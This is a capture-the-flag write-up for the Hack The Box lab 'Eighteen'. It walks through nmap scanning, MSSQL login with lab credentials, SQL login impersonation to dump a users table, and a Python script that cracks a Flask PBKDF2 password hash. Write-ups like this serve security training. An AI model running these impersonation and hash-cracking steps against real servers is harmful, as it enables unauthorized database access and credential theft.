Hack The Box - Eighteen Writeup

Box Name: Eighteen
Difficulty: Easy
OS: Windows Server 2025
Release Date: November 2025

Reconnaissance

Initial Credentials

The box provides initial credentials:

  • Username: kevin
  • Password: iNa2we6haRj2gaw!

Port Scanning

# Initial scan
nmap -p- -T4 --min-rate 1000 <TARGET_IP>

# Service enumeration
nmap -p 80,1433 -sCV <TARGET_IP>

Open Ports:

  • 80/tcp - Microsoft IIS 10.0 (HTTP)
  • 1433/tcp - Microsoft SQL Server 2022

Key Findings:

  • Domain: eighteen.htb
  • Hostname: DC01.eighteen.htb
  • This is a Domain Controller

Add to /etc/hosts

echo "<TARGET_IP> eighteen.htb dc01.eighteen.htb" | sudo tee -a /etc/hosts

Initial Access

MSSQL Enumeration

Attempt 1: SQL Authentication (Guest Access)

impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@<TARGET_IP>'

Result: Connected as guest with limited privileges.

Enumerate Logins

-- Check current user
SELECT SYSTEM_USER, USER_NAME();

-- List databases
SELECT name FROM master.dbo.sysdatabases;

Databases Found:

  • master
  • tempdb
  • model
  • msdb
  • financial_planner (custom database - access denied)

Discover Impersonation Rights

using enum_impersonate

Key Finding: Kevin can IMPERSONATE the appdev login!

Impersonate appdev and Access Database

-- Impersonate appdev
EXECUTE AS LOGIN = 'appdev';

-- Verify
SELECT SYSTEM_USER, USER_NAME();

-- Access financial_planner database
USE financial_planner;

-- List tables
SELECT name FROM sys.tables;

Tables Found:

  • users
  • incomes
  • expenses
  • allocations
  • analytics
  • visits

Extract User Credentials

SELECT * FROM users;

Found Admin Hash:

  • Username: admin
  • Email: [email protected]
  • Hash: pbkdf2:sha256:600000$<REDACTED_SALT>$<REDACTED_HASH>

Crack the Password Hash

Created a Python script to crack the Flask PBKDF2 hash:

#!/usr/bin/env python3
import hashlib
import gzip
from multiprocessing import Pool, cpu_count

def check_password(args):
    password, salt, iterations, target_hash = args
    try:
        computed = hashlib.pbkdf2_hmac('sha256', password, salt.encode('utf-8'), iterations)
        if computed.hex() == target_hash:
            return password.decode('utf-8', errors='ignore')
    except:
        pass
    return None

# Hash components
salt = "<REDACTED_SALT>"
iterations = 600000
target_hash = "<REDACTED_HASH>"

# Run against rockyou.txt with multiprocessing

Cracked Password: iloveyou1

#windows #exploit #HTB